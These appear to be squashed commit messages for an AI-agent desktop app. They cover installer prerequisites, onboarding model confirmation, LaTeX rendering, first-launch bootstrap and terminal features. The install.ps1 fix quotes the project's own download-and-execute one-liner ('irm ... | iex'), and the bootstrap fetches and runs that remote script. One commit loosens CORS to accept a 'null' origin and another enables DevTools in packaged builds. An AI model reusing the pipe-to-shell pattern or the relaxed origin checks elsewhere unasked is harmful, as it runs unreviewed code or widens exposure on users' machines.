Behavior preserved: matches lines that are (whitespace + marker +
whitespace), which is what the original `\n[ \t]*${marker}[ \t]*(?=\n|$)`
matched. All 12 markdown-text tests still pass.
* fix(process-registry): suppress windows-footgun false positive on guarded killpg
Keep the existing POSIX-only process-group teardown path, but make the
signal selection explicit via getattr and add an inline windows-footgun
suppression marker on the guarded os.killpg line so the Windows footgun
check no longer blocks CI on this intentionally platform-gated code.
* feat(desktop): reconcile live tool events, polish thread chrome, harden boot
- chat-messages: match tool rows by overlapping query/context/preview values
so preview-first `tool.progress` rows reliably adopt later stable-id
`tool.start` payloads instead of spawning ghost rows or mis-merging
parallel same-name calls; preserve prior args/result across phases.
- tui_gateway: emit full args + parsed result on `tool.start` / `tool.complete`,
drop redundant `tool.started` re-emit from `tool.progress`.
- electron/main: prefer SOURCE_REPO_ROOT before PATH `hermes` in dev so
local backend edits actually run; split hardening helpers into
`electron/hardening.cjs` with tests.
- thread/tool UI: one-shot enter animation keyed by stable ids, braille
spinner for running rows, Cursor-like disclosure rows, drill-down +
duration/count formatting via new tool-fallback-model.
- composer: extract `text-utils`, drop liquid-glass overrides.
- right-rail: split preview-pane into preview-console / preview-file.
- runtime: incremental external-store runtime + runtime-readiness gate;
onboarding store + tests; route-resume hook test.
- regression tests for live tool reconciliation (parallel tools, id-less
progress, preview-first rows, structured args/results).
* feat(desktop): add ripgrep to NSIS prereq page + polish layout
Add ripgrep as a third (recommended) prereq alongside Python and Git in
the NSIS prereq detection page, and clean up the page layout based on
on-VM testing.
Why ripgrep
- Hermes' search_files tool calls `rg` directly for content + filename
search (tools/file_operations.py:1382). Falls back to grep/find from
Git Bash when missing — works but slower and noisier (no .gitignore
awareness).
- ~5MB winget install via `BurntSushi.ripgrep.MSVC --scope user` — no
UAC prompt, parallel to how Python installs.
- scripts/install.ps1 already installs ripgrep as part of
Install-SystemPackages; this brings the desktop installer to parity.
Why "recommended" not "required"
- Python and Git are hard requirements: without them the agent runtime
or terminal tool refuses to start. The bootstrapper preflight throws.
- ripgrep is a performance enhancement: missing it just means slower
searches. Page wording reflects this; failure to install is logged
but doesn't show a MessageBox or block.
Layout polish (response to on-VM screenshot review)
- Wizard header now correctly reads "System Requirements" instead of
the leftover "Choose Install Location" from the previous page. Set
via `GetDlgItem $HWNDPARENT 1037/1038` + WM_SETTEXT — the standard
NSIS pattern for overriding the page header on a custom Page.
- Removed redundant in-body title + verbose intro paragraph; the
wizard header IS the title now. Body has one short intro line.
- Group boxes tightened to 26u with content positioned just below the
groupbox title (not top-anchored status + bottom-anchored checkbox
with empty space in the middle). All three panels + footer fit
comfortably in 126u, well under the 140u page limit.
- Checkbox labels simplified: dropped "(per-user, no admin prompt)"
and "(administrator approval required)" suffixes. The footer note
still calls out UAC for Git when relevant.
- Footer text trimmed to fit cleanly without clipping.
Install order (in customInstall macro)
- Python → ripgrep → Git
- Python and ripgrep are silent and run first; Git's UAC prompt comes
last so the user's approval interaction isn't interrupted by silent
activity afterwards.
Skip behavior unchanged
- All three detected → page auto-skips via Abort
- Silent install (/S) → customInstall winget block skips
- User unchecks all → page advances without running winget
Files
- apps/desktop/installer/prereq-check.nsh: ripgrep detection block,
ripgrep page panel + checkbox, ripgrep customInstall block,
GetDlgItem header override, layout reflow
- apps/desktop/README.md: Runtime prerequisites section updated to
list ripgrep as recommended, with manual winget command
* feat(desktop): add model-confirmation step to onboarding
After OAuth/API-key login completes, onboarding now shows a confirmation
card with the curated default model and a Change button before dropping
the user into chat. Closes the gap where the desktop's `model.default`
was empty after first launch and the agent had to fall back to whatever
heuristic happened to fire — leaving users wondering "why am I getting
sonnet-4 when I logged into Nous Portal?"
Why
- Desktop onboarding only persisted credentials, never `model.default`.
The CLI's `hermes model` command pairs provider + model selection,
but the desktop's onboarding skipped the model step entirely.
- Result: users saw whichever model the agent's auto-fallback picked,
unpredictably and undocumented.
- For the BUILD demo we want users to land on the model they expect
for their provider, with a clear "this is what you're getting" UI
and a one-click path to change it before chatting.
How
- New `confirming_model` flow status carries the just-authenticated
provider slug, current default model, label, and a saving flag.
- `completeWithModelConfirm()` runs after credentials succeed: reloads
env, verifies runtime, fetches /api/model/options to find the curated
first-model for the provider, persists it via /api/model/set, then
transitions into `confirming_model`.
- If anything fails (no providers returned, network error), falls
through to the previous behaviour — onboarding completes without
the confirm step. Polish, not a hard requirement.
- All four credential paths (device_code OAuth, PKCE OAuth, external
CLI flow, API key) now use completeWithModelConfirm instead of
reloadAndConnect.
UI
- `ConfirmingModelPanel` shows: green "<provider> connected" banner,
card with "Default model: <name>" + Change button, and a "Start
chatting" CTA that finalises onboarding.
- Reuses the existing `ModelPickerDialog` (the same picker available
from the chat shell) for the change-model UX. Search, filtering,
multi-provider listing — all already built.
- Stacking: ModelPickerDialog defaults to z-130, which renders UNDER
the onboarding overlay (z-1300) and breaks pointer events. Added
optional `contentClassName` prop to ModelPickerDialog so callers
can override; onboarding passes `z-[1310]`.
Provider-slug matching
- For OAuth flows: pass `provider.id` directly as the preferred slug.
- For API-key flows: `OPENROUTER_API_KEY` → "openrouter" via env-key
prefix strip. Also includes the user-visible label as a fallback
candidate.
- fetchProviderDefaultModel falls back to the first authenticated
provider in the response if no preferred slug matches — so even a
miss still surfaces a reasonable default.
Files
- apps/desktop/src/store/onboarding.ts:
+ new `confirming_model` flow variant
+ fetchProviderDefaultModel + completeWithModelConfirm helpers
+ setOnboardingModel (optimistic update + revert on failure)
+ confirmOnboardingModel (finalises onboarding from the card)
- reloadAndConnect (replaced; the four call sites now go through
completeWithModelConfirm)
- apps/desktop/src/components/desktop-onboarding-overlay.tsx:
+ ConfirmingModelPanel component
+ new branch in FlowPanel for status `confirming_model`
+ ModelPickerDialog usage with z-[1310] content class
- apps/desktop/src/components/model-picker.tsx:
+ optional `contentClassName` prop on ModelPickerDialog so the
dialog can be stacked on top of other fixed overlays
Tested
- `npm run type-check` passes
- `npx eslint` clean on touched files
- Live test in `npm run dev`: cleared onboarding cache, walked
through Nous device-code flow, saw confirm card with curated
default, clicked Change → ModelPickerDialog rendered above the
onboarding overlay with working pointer events, picked a different
model, "Start chatting" persisted to ~/.hermes/config.yaml.
* fix(desktop): suppress generic provider warning in onboarding
Hide the red setup notice when the message is the generic missing-provider guidance, since onboarding already presents provider auth actions. Centralize provider-setup matching across desktop hooks and add coverage for the matcher.
* fix(desktop): add 2u clearance below prereq checkboxes
Group box bottom border was clipping the checkboxes by 1-2px.
Bumped each box height 26u→30u; checkboxes now sit 2u above the bottom border.
* fix(nix): refresh dashboard lockfile hash
Update the web npm deps hash in nix/web.nix to match the committed apps/dashboard/package-lock.json so bb/gui passes the nix lockfile check.
* fix(desktop): install TUI deps in release workflow
Ensure desktop release builds install the standalone ui-tui package before bundling the TUI payload.
* fix(desktop): run release builder from app package
Invoke the desktop builder through the package script so electron-builder uses apps/desktop/package.json.
* fix(desktop): expand release artifact names safely
Build desktop artifact names from workflow version/channel while preserving electron-builder platform macros.
* fix(desktop): use package artifact naming in release workflow
Let electron-builder's desktop package config provide platform-specific artifact extensions while the workflow injects the release version/channel metadata.
* fix(nix): fetch dashboard npm deps from package root
Point the dashboard npm dependency fetch at apps/dashboard so Nix can find the package lockfile after the dashboard move.
* fix(nix): build dashboard from package directory
Set the web package source root to apps/dashboard so npm patch/build phases run beside the dashboard lockfile while keeping apps/shared available as a sibling.
* feat(desktop): render LaTeX math via KaTeX after streaming completes
Add @streamdown/math plugin to the chat markdown renderer.
Inline ($x^2$) and block ($$...$$) math both supported with
singleDollarTextMath enabled. Plugin is gated to non-streaming state
to match the existing pattern for syntax highlighting — math renders
when the message completes, avoiding KaTeX re-render churn during
streaming. KaTeX CSS is imported in styles.css; ~30KB CSS + ~430KB
JS added to the bundle. Smoothness improvements during streaming
deferred to a follow-up.
* perf(desktop): memoize KaTeX renders so math streams without re-rendering
Wrap rehype-katex with a per-equation LRU cache (keyed by
displayMode + source text) and re-enable math during streaming.
Stock @streamdown/math runs rehype-katex on every markdown commit,
so each new token re-katexes every equation in the message. For
math-heavy responses (an equation derived step-by-step) that's
hundreds of ms of wasted work per token and the streaming UI
chokes. With memoization, each equation pays katex.renderToString
exactly once; subsequent tokens re-walk the tree but hit cache for
unchanged equations.
The wrapper mirrors rehype-katex's semantics exactly: same class
detection (language-math, math-inline, math-display), same
<pre>-walk-up for fenced math blocks, same parent.children.splice
replacement, same SKIP traversal, same strict-then-lenient render
strategy with VFile message reporting.
Cached children are structuredCloned on each splice so downstream
rehype plugins or toJsxRuntime can't mutate the cache.
* fix(desktop): declare katex-memo deps directly + drop per-app lockfile
katex-memo.ts (added in 112cad59b) imports hast-util-from-html-isomorphic,
hast-util-to-text, remark-math, katex, and unist-util-visit-parents but
those were never added to apps/desktop/package.json. They were silently
resolving via @streamdown/math at the workspace root, which broke the
moment `npm i --prefix apps/desktop` ran with the per-workspace lockfile
because that install only consults apps/desktop/package.json. Add them
as direct deps, plus unified/vfile/@types/hast for the type imports.
Also delete apps/desktop/package-lock.json — root package.json declares
workspaces: ["apps/*"], so npm manages all lockfile state at the root.
The stale per-app lockfile is what made `npm i --prefix apps/desktop`
diverge from the workspace install in the first place and left an empty
apps/desktop/node_modules/@assistant-ui/ stub that Vite's dep optimizer
then tried (and failed) to open at @assistant-ui/core/dist/internal.js.
* feat(desktop): disable Backdrop noise overlay by default
The noise overlay defaulted to on, which adds a busy speckle layer over
the whole window for every new user. Flip the Leva default to off; the
toggle stays in Backdrop / Noise for anyone who wants it back.
* fix(desktop): polish LaTeX rendering — currency, code blocks, brackets
Five distinct bugs surfaced from a math-heavy stress test:
1. Adjacent code fences glued together. scrubBacktickNoise's
second-pass regex /``\s*``/g matched the LAST 2 backticks of
one fence + whitespace + FIRST 2 backticks of the next, collapsing
two blocks into one. Fixed with lookbehind/lookahead so we only
match exactly 2 backticks not part of a longer run.
2. Whitespace eaten between fences and following content.
stripPreviewTargets internally calls .trim() which strips leading/
trailing whitespace from each split-segment. For segments between
two fences this collapsed \n\n to '', gluing fence close to next
block. Fixed by capturing leading/trailing whitespace at the call
site and restoring it after the transform.
3. Currency dollar signs eaten as math. With singleDollarTextMath:true
remark-math greedy-matched any pair of $, so '$5 ... $10' became
one inline math span. Added escapeCurrencyDollars to escape $<digit>
patterns to \$<digit> in prose segments (not in code). Trade-off:
math expressions starting with a digit (rare — '$5x = 10$') get
escaped too. Mirrors the convention in ChatGPT/Claude's UIs.
4. \(...\) and \[...\] LaTeX brackets unsupported. Models often
emit these instead of $...$ / $$...$$. Added
rewriteLatexBracketDelimiters preprocessor pass.
5. ```latex / ```tex blocks were being routed to KaTeX via a
rewrite to ```math. Aligns with GitHub markdown convention:
```math = render as math; ```latex / ```tex = LaTeX/TeX
source code (syntax highlighted, not rendered). Conflating them
broke teaching/showing-source use cases. MATH_FENCE_LANGUAGES
pruned to {'math'} only.
Also flipped parseIncompleteMarkdown to true (was !isStreaming) so
the math parser can't see $ inside streaming-but-not-yet-closed code
fences. Shiki was already deferred via defer={isStreaming} so this
doesn't introduce new tokenization cost.
Test: 18/18 existing tests still pass; one test updated to expect
escaped \$ in currency-prose-with-URL case.
* fix(desktop): detect Python via registry/filesystem; pin to 3.11–3.13
Two related fixes for Python detection on Windows:
1. py.exe (Python launcher) is missing from per-user installs that
didn't check the launcher option, so 'py -3.X --version' alone
misses real Python installs. User-reported case: clean Win11 +
official Python.org 3.14 install -> 'where py' returned nothing,
our installer offered to install Python again. Both NSIS prereq
page and main.cjs now probe in this order:
1. py.exe launcher (when present)
2. PEP 514 registry: HKLM/HKCU\SOFTWARE\Python\PythonCore\<v>\InstallPath
3. Filesystem: %ProgramFiles%\Python<v>, %LocalAppData%\Programs\Python\Python<v>
Crucially, we never fall back to running 'python.exe' from PATH
on Windows — the WindowsApps stub at %LOCALAPPDATA%\Microsoft\
WindowsApps\python.exe is a redirector that opens the Microsoft
Store window if no Store Python is installed. Triggering that
during boot would be terrible UX. Registry/filesystem probes
never execute the binary.
2. Drop 3.14 from the supported version set. Several Hermes deps
(notably pywinpty, which carries Rust crates like
windows_x86_64_msvc) don't yet publish 3.14 wheels. With wheels
missing, 'pip install -e .' falls back to building from sdist,
which needs a Rust toolchain — users see 'could not compile
windows_x86_64_msvc build script' on first run. install.ps1
sidesteps this by pinning to 3.11 via uv; the desktop installer
doesn't yet have the same uv-managed-Python pathway, so for now
we accept 3.11/3.12/3.13 and tell winget to install 3.11 if
none of those are present. Revisit when the wheel ecosystem
catches up to 3.14 (~early 2026).
* feat(desktop): Cron, Profiles, usage analytics, and titlebar fixes
- Add Cron and Profiles sidebar routes with full CRUD-style flows and API wiring.
- Extend Command Center with auxiliary task overrides and a Usage panel (7d/30d/90d).
- Fix titlebar geometry for WSL/Windows (native overlay width, tool spacing).
- Remove stray merge conflict markers from pyproject.toml optional deps.
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(title-bar): position sidebar toggle button
* feat(desktop): composer queue — queue many, edit/delete/cancel-edit, Cursor-style
Press Enter while busy with a draft to queue it; with no draft to interrupt
and send the next queued turn. Auto-drains one queued turn each time the
session settles, same as Cursor. Queue persists across reloads so an
interrupted-and-queued turn isn't lost on refresh.
Each queued row supports edit-in-composer (with explicit Save/Cancel),
send-now (↑), and delete. Drain skips only the entry currently being
edited so the rest of the queue keeps flowing.
Queue dequeue is transactional — an entry only leaves the queue after
`prompt.submit` is accepted, so a rejected submit doesn't drop the turn.
Also shrinks the `[interrupted]` marker to a muted one-liner and drops
its assistant footer so it stops looking like a real reply.
* fix(desktop): handle empty usage analytics totals
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(desktop): address PR review titlebar and usage races
Co-authored-by: Cursor <cursoragent@cursor.com>
* feat(desktop): add MCP settings and live subagent tree
Surface configured MCP servers in Settings with JSON edit/save and a gateway-backed reload action so users can manage tool servers without falling back to slash commands.
Track live subagent gateway events in a desktop store, show active subagent counts in the Agents statusbar item, and replace the Agents overlay stub with a live spawn tree for the active session.
* fix(desktop): move power-user views out of sidebar
Keep Cron and Profiles available through lower-prominence chrome entry points so the workspace sidebar stays focused on core chat navigation.
Co-authored-by: Cursor <cursoragent@cursor.com>
* refactor(desktop): subagent overlay reads like a live transcript, not a dashboard
Strip the card chrome and rewire /agents to feel like peeking into the
child agent's stream:
- subagents store: single `stream` of typed entries (thinking/tool/progress/
summary) replaces the parallel notes/thinking/tools arrays. Drop unused
fields (toolsets, depth, apiCalls, reasoningTokens, sessionId).
- agents view: no OverlayCards, no boxed stream, no per-row borders. Goal +
status pill + indented stream lines, full row width.
- Group root spawns into "Delegation N" sections when batch shape + spawn
time match — hides task-index interleaving and makes hierarchy obvious.
- Sort tree by spawn time, then task_index. Step indicator is one colored
pill (primary while running, emerald when done) inside the row, not a
trailing pill that wrapped under the chevron.
- Tree picks up `subagent.start` (not only `spawn_requested`) and prunes
delegate-tool fallback rows once native subagent events land for the
session — fixes duplicate "Delegated task" rows alongside the real ones.
* feat(desktop): Esc closes every OverlayView-based overlay
Lift the keyboard handler into the shared OverlayView so Agents, Settings,
Command Center — and anything we build on top of it later — all dismiss on
Esc by default. Nested Radix dialogs stop propagation themselves, so a
modal opened inside an overlay (e.g. model picker inside Settings) still
closes the modal first, not the overlay underneath.
Drop the now-redundant Esc handlers in Settings (kept Cmd/Ctrl+P) and
Command Center.
* fix(desktop): drop numbered step pill on subagent rows
The pill was getting clipped at the overlay edge anyway. Just use the
status glyph (●/✓/✗/■/○) — the delegation header already conveys
"3 workers, 3 active", and order in the list implies which step you're
looking at.
* fix(desktop): drop noisy "returned N items / empty object" stub strings
When a tool returns nothing useful, the row should be silent — the title
("Search Files", etc.) already tells the user what happened. Counting the
fields in an opaque payload is engineer-noise.
`formatToolResultSummary` and `minimalValueSummary` now return '' for
empty arrays / records / unrecognized values; tool-fallback already hides
the detail section when its body is empty.
* refactor(desktop): subagent rows borrow chat tool patterns (fade-in, lucide glyphs, shimmer)
Pull the agents view closer to how chat tool blocks render:
- statusGlyph() returns the same lucide BrailleSpinner / CheckCircle2 /
AlertCircle vocabulary as tool-fallback's statusGlyph
- Stream lines fade-in via useEnterAnimation (one-shot WAAPI), keyed per
entry so streamed deltas settle in instead of popping
- Subagent rows fade in too, and pick up the existing data-slot=tool-block
spacing rules between blocks
- Active stream line trails a BrailleSpinner instead of a hand-rolled
pulsing rectangle
- Goal text drops FadeText (which forces nowrap); keep FadeText only for
the single-line meta subtitle
- Running rows shimmer the title — same affordance the chat thinking row
uses
* refactor(desktop): make /agents subagent-only, drop sidebar + dead sections
Activity rail and History stub were both noise. Strip the split layout,
sidebar, route enum, and the rail/stub helpers — the overlay is now just
the spawn tree, centered in a max-w-3xl column so it stops claiming the
whole screen for one section's worth of content.
* feat: update cron modals
* Add dedicated GUI log stream for dashboard debugging.
Capture dashboard and PTY websocket lifecycle failures in gui.log and expose it via hermes logs.
* Improve desktop runtime UX by surfacing inference readiness in gateway status and hardening WSL link opening.
This also stabilizes markdown code/table block spacing and adds root-install guards so desktop dev runs use a healthy workspace dependency tree.
* Log detailed GUI websocket failure metadata.
Capture richer reject/disconnect/send/parse context for dashboard gateway websocket flows so GUI connection failures are diagnosable from logs.
* Default dashboard startup logging to GUI mode.
Detect the dashboard subcommand during early CLI bootstrap so gui.log is attached from process start and GUI startup failures are always captured.
* Clean up gateway status conditionals and logging bootstrap mode detection.
Simplify nested dashboard gateway status branches for readability and use a concise first-subcommand check when selecting early GUI logging mode.
* add logging to nsis installer
* feat: glass ui pass
* fix(desktop): persist inline assistant errors across hydrate/resume
- Detect provider failure text arriving via message.complete
(HTTP 4xx, "API call failed after N retries", Provider/Gateway
error: ...) and persist as an inline assistant error instead of
regular completion text, blocking the hydrate that was wiping it.
- preserveLocalAssistantErrors: merge by id so same-id hydrated
messages keep their local error, and preserve the optimistic
user+error pair as a unit (with tail-user dedupe).
- Hook all hydrate/resume writers (use-session-actions resume +
fallback, hydrateFromStoredSession, syncSessionStateToView) into
the merge so stale snapshots can't clobber a failed turn.
- Add error to chatMessagesEquivalent so the resume diff actually
sees error-only changes and paints them.
- editMessage on a failed turn now submits a plain resend (no
truncate_before_user_ordinal) and retries plainly on the
"no longer in session history" race.
Style polish on touched files:
- Inline error: text-only treatment (no card).
- User stop / edit-composer send: shared Tabler IconPlayerStopFilled
glyph + shared icon-button class slot for parity.
* feat(desktop): theme xterm with active light/dark mode
The right-sidebar terminal hardcoded a light palette, which read poorly
on the dark glass surface. Subscribe to `useTheme().resolvedMode` and
hot-swap `term.options.theme` so Shift+X (and any other mode change)
updates the terminal in place without tearing down the PTY session.
Dark mode uses xterm's built-in defaults (white fg/cursor + vivid ANSI
16) with just a transparent background so the glass shows through;
light mode keeps the existing hand-tuned overrides for legibility on a
bright surface.
* feat(sidebar): right-click + drag-reorder sessions and workspaces
- Wire right-click on session rows to open the same actions menu;
suppresses the OS-native context menu so Windows stops looking awful.
- Share dropdown + context menu items via useSessionActions() driving
a single declarative ItemSpec[]; render polymorphic over MenuItem.
- New shadcn ContextMenu primitive mirroring DropdownMenu styling.
- Restore drag-and-drop reordering for Agents (lost during the cwd
cleanup) and add reordering of workspace groups via a right-side
grab handle. Pinned reorder unchanged.
- Generic orderByIds<T> replaces the duplicated session/group orderers;
useSortableBindings() hook collapses the two Sortable wrappers.
- cursor-pointer on every actionable element; cursor-grab on handles.
- KISS pass: baseName() helper, AGE_TICKS table, single WORKSPACE_PAGE
constant, flatter SidebarSessionsSection render.
* feat(desktop): solarize the xterm palette in both light & dark
xterm's default ANSI 16 is tuned for dark and reads candy-bright on the
light glass surface (vivid cyans/greens). Ship the canonical Solarized
palette (Schoonover) for both modes — same 16 accents either way, only
fg/cursor swap between `base00/01` (light) and `base0/1` (dark), so a
prompt's colors look uniform across a Shift+X toggle.
Background stays transparent in both modes — Solarized's cream/slate
backgrounds would fight the glass.
* feat(desktop): virtualize chat thread + sidebar via TanStack Virtual
Replaces `use-stick-to-bottom` and per-row session rendering with
`@tanstack/react-virtual`, matching what Cursor uses.
Chat thread (`thread-virtualizer.tsx`):
- Natural-flow virtualization (padding spacers, not absolute items) so
`position: sticky` on the human bubble still resolves cleanly against
the scroller.
- Custom at-bottom anchor: pins when armed, disarms on user-driven
upward scroll, re-arms at bottom, jumps on session switch +
`thread.runStart`.
- Loading indicator and `--thread-last-message-clearance` move to a
real `[data-slot=aui_composer-clearance]` node; drops the brittle
`:nth-last-child(1 of …)` rule that can't fire reliably under
virtualization.
Sidebar (`virtual-session-list.tsx`):
- Flat agents list virtualizes at >=25 rows; pinned and
workspace-grouped paths stay direct-render.
- `SortableContext` keeps all IDs; only the window mounts; dnd-kit's
`setNodeRef` is merged with `virtualizer.measureElement` so rows
participate in both DnD hit-testing and TanStack measurement.
Drops `use-stick-to-bottom`. Streaming test gets a global
`offsetWidth/offsetHeight` stub so the virtualizer's viewport sizing
works in jsdom; the scroll-up-doesn't-pull-back invariant still passes.
* feat: more ui qa
* fix(desktop): trim sidebar terminal startup spacer
Drop zsh's initial spacer row before writing the first terminal prompt so new sidebar terminal sessions do not open with a selectable blank line.
* chore: uptick
* feat(desktop): thin installer + first-launch install.ps1 bootstrap
Converges the Windows packaged desktop installer onto a single canonical
install topology: drop the Electron shell only (~80MB instead of ~500MB),
clone Hermes Agent at a build-time-pinned commit on first launch via
install.ps1's stage protocol, and treat the resulting git checkout at
%LOCALAPPDATA%\hermes\hermes-agent\ as the canonical install location
(same path the CLI installer uses). Future updates flow through the
existing applyUpdates() git-pull path.
Replaces the previous fat-installer architecture where the .exe bundled
a pre-staged hermes-agent source tree under resources/hermes-agent/ that
was then sync'd into ACTIVE_HERMES_ROOT at launch -- a complicated
factory-vs-active dance with several footguns (FACTORY_HERMES_ROOT
mismatch on path resolve, isGitCheckout guard regressions, pyproject
hash drift detection inside the sync loop).
Architecture overview
---------------------
Build time
apps/desktop/scripts/write-build-stamp.cjs writes
apps/desktop/build/install-stamp.json with {commit, branch, builtAt,
dirty}. Honours $GITHUB_SHA / $GITHUB_REF_NAME in CI, falls back to
`git rev-parse HEAD` locally.
apps/desktop/scripts/stage-native-deps.cjs copies the runtime subset
of @homebridge/node-pty-prebuilt-multiarch from the workspace-root
node_modules into apps/desktop/build/native-deps/. Workspace dedup
hoists this dep to the root, out of reach of electron-builder's
`files:`-restricted collector; staging gives us a deterministic
path to extraResources.
electron-builder ships both into resources/install-stamp.json and
resources/native-deps/ respectively.
Boot resolver (electron/main.cjs)
Resolver order:
1. HERMES_DESKTOP_HERMES_ROOT override
2. SOURCE_REPO_ROOT (dev mode)
3. ACTIVE_HERMES_ROOT git checkout WITH .hermes-bootstrap-complete
marker -- the post-install fast path
4. `hermes` on PATH (CLI-installed user adding the desktop)
5. pip-installed hermes_cli via system Python
6. bootstrap-needed sentinel -> hand off to runBootstrap
Deletes the entire FACTORY_HERMES_ROOT / RUNTIME_MARKER /
syncTreeExcludingVenv machinery (-200 lines). The isGitCheckout
guard that bit us in the install.ps1 PR is gone.
First-launch bootstrap (electron/bootstrap-runner.cjs)
1. Resolve install.ps1: prefer SOURCE_REPO_ROOT/scripts (dev), else
download from GitHub raw at INSTALL_STAMP.commit (cached at
HERMES_HOME\bootstrap-cache\install-<sha>.ps1).
2. Fetch the stage manifest via install.ps1 -Manifest -Commit X
-Branch Y.
3. Iterate stages: install.ps1 -Stage <name> -NonInteractive -Json
-Commit X -Branch Y per stage.
4. On all stages green: write the .hermes-bootstrap-complete
marker with {schemaVersion, pinnedCommit, pinnedBranch,
completedAt, desktopVersion}.
Per-run log to HERMES_HOME\logs\bootstrap-<ts>.log. Cancellation
via AbortSignal. Manifest cache so retries don't re-download.
Install overlay (src/components/desktop-install-overlay.tsx)
Mounted alongside the existing onboarding overlay; flexbox card
with header (static) + middle (scrollable) + footer (failure-only,
static). Subscribes to hermes:bootstrap:event IPC + resyncs from
hermes:bootstrap:get on mount/reload. Renders:
- 14-stage checklist with per-stage state icons
- Overall progress bar + current-stage spotlight
- Auto-expanded installer-output panel on failure
- "Copy output" button (full ring buffer + error to clipboard)
- "Reload and retry" wired through hermes:bootstrap:reset to
clear main.cjs's latched failure
Synthetic empty-manifest event from main.cjs flips the overlay to
'active' immediately so the slow install.ps1 download doesn't
leave the user staring at the generic Preparing splash.
Failure latching (main.cjs)
bootstrapFailure module-scope variable holds the rejection after
install.ps1 fails. startHermes() throws the latched error
immediately when set, bypassing the entire ensureRuntime +
runBootstrap chain. Without this, the renderer's ensureGatewayOpen
retries would re-run install.ps1 in a 5-10 min hot loop while the
user was still reading the failure overlay. Cleared via
hermes:bootstrap:reset on user-driven retry.
Unsupported-platform overlay (1F)
macOS / Linux packaged builds (no install.sh stage protocol yet)
emit an unsupported-platform event with a copy-pasteable install
command + docs URL. Dedicated overlay branch with "Copy command"
+ "I've run it -- retry" buttons.
install.ps1 additions (Phase 1F.3 + 1F.5)
-----------------------------------------
New -Commit and -Tag string params. Precedence Commit > Tag >
Branch. Honoured by all three code paths (update / fresh clone /
ZIP fallback), with archive URL selection that handles each
ref-type variant. Detached-HEAD checkouts intentionally -- they're
pins, not branches the user pulls into.
EAP=Continue wrap around the new pin-step git invocations. `git
fetch origin <commit>` writes the routine 'From <url>' info line to
stderr; under the script's global EAP=Stop that terminates the
script even though fetch+checkout succeed. Matches the established
pattern in Install-Uv, Test-Python, _Run-NpmInstall.
Backend fix (hermes_cli/web_server.py)
--------------------------------------
CORS allow_origin_regex now accepts Origin: 'null'. Packaged
Electron loads index.html via file://; Chromium sets the WebSocket
upgrade Origin header to the opaque origin 'null', which the old
regex rejected with HTTP 403 before gateway_ws() ever ran. This
failure mode was masked in the older FACTORY_HERMES_ROOT
architecture because the resolver often found an existing hermes
on PATH with different binding behavior.
Security maintained: localhost-only bind keeps cross-machine pages
out; per-process session token still gates every authenticated
/api/ endpoint regardless of Origin.
Desktop QoL
-----------
DevTools is now enabled in packaged builds (F12 / Cmd+Opt+I).
Field-debugging trade-off: tiny attack surface increase versus
a much better support story when CSP / WS / theme issues surface.
NSIS prereq-check page deleted (-767 lines). The standard
Welcome -> License -> Directory -> InstallFiles -> Finish wizard
now installs without custom Python/Git/ripgrep detection -- those
prereqs are install.ps1's job at first launch.
Test infrastructure (Phase 1G)
------------------------------
apps/desktop/scripts/test-desktop.mjs rewritten as a cross-platform
bundle validator (was darwin-only and asserted on dead factory-
payload paths):
NEGATIVE: hermes_cli/main.py is NOT shipped (regression guard)
POSITIVE: install-stamp.json carries a real commit + branch
POSITIVE: node-pty native deps shipped under resources/native-deps
POSITIVE: renderer dist/index.html reachable (asar or unpacked)
New nsis mode and npm run test:desktop:nsis script.
Validated end-to-end on clean Win10 VM
--------------------------------------
Confirmed: NSIS installer drops Electron shell, app launches,
install overlay shows progress, install.ps1 clones the pinned
commit, 14 stages run to completion, marker written, backend
spawns, WebSocket connects, onboarding overlay asks for API key,
main UI loads, integrated terminal works.
Failures handled: bootstrap stays failed (no hot-loop retry),
"Copy output" gives actionable transcript, "Reload and retry"
explicitly re-runs install.ps1.
What's deferred
---------------
- MSIX wrapping (Phase 2): same Electron .exe under MSIX manifest
with runFullTrust, signed and submitted to Microsoft Store.
- install.sh stage protocol parity (Phase 2): once shipped, the
unsupported-platform overlay becomes drive-it-yourself and
macOS/Linux packaged installers gain feature parity with Windows.
* feat(desktop): persistent terminal pane + fullscreen takeover
Adds a VSCode-style "focus terminal" toggle to the right sidebar's Terminal
tab that takes over the chat pane area without unmounting the shell. The
xterm host is mounted once at the layout root and CSS-overlayed onto
whichever <TerminalSlot /> is currently active, so the PTY session,
scrollback, selection, focus, and WebGL renderer survive every toggle.
Also:
- WebGL renderer (matching dashboard ChatPage) so Hermes' TUI skins paint
faithfully instead of muting through xterm's default DOM renderer
- File drag/drop from the project tree or OS into xterm — paths are
shell-quoted (zsh/bash/pwsh/cmd) and written straight into the PTY
- Solarized dark canvas with brights promoted to real accent variants
(Schoonover's UI-gray brights washed out every TUI accent)
- Strip NO_COLOR/FORCE_COLOR/COLORFGBG/TERM=dumb leaking from non-tty
parents (CI runners, Cursor's agent shell) so the embedded shell gets
truecolor regardless of how Electron was launched
- rAF-debounced ResizeObserver — running fit.fit() synchronously during
sibling pane transitions crashed the WebGL texture-atlas rebuild
* fix(install.ps1): strip UTF-8 BOM regression that broke 'irm | iex'
The canonical install flow
irm https://raw.githubusercontent.com/.../scripts/install.ps1 | iex
fails on PowerShell 5.1 with a cascade of 'The assignment expression
is not valid' errors at every param() default value:
[string]$Branch = 'main',
~~~~~~
The assignment expression is not valid. The input to an assignment
operator must be an object that is able to accept assignments...
Root cause: scripts/install.ps1 carries a UTF-8 BOM (0xEF 0xBB 0xBF)
as its first three bytes. 'irm' returns the response body as a string;
on PS 5.1 the BOM survives into that string as a leading \ufeff
character. 'iex' then evaluates the string and PS's parser chokes
on the invisible character before param() -- error recovery proceeds
into the body but every assignment is reported as broken.
This was the exact failure mode the install.ps1 hardening pass (PR
#27224) deliberately fixed by stripping the BOM and ensuring the
file body is pure ASCII. Commit 4279da4db ('fix(windows): make
PowerShell installer parse in 5.1') re-introduced the BOM later,
unintentionally undoing the irm|iex compatibility fix; the merge
that brought it into bb/gui carried it forward.
Fix: strip the three BOM bytes. File body is verified pure ASCII
(any-byte > 127 returns false), so PS 5.1 with no BOM falls back to
Windows-1252 decoding which is identical to ASCII for our content.
Both install paths now work:
- 'irm ... | iex' (canonical CLI)
- 'powershell -File install.ps1' (programmatic / desktop bootstrap)
* install.ps1: detect ARM64 Windows reliably for Node and Git stages
Add a Get-WindowsArch helper that reads Win32_Processor.Architecture
via CIM (invariant to PowerShell host bitness) with PROCESSOR_ARCHITEW6432
fallback. Use it in:
- Install-Git: previously only triggered the arm64 PortableGit asset
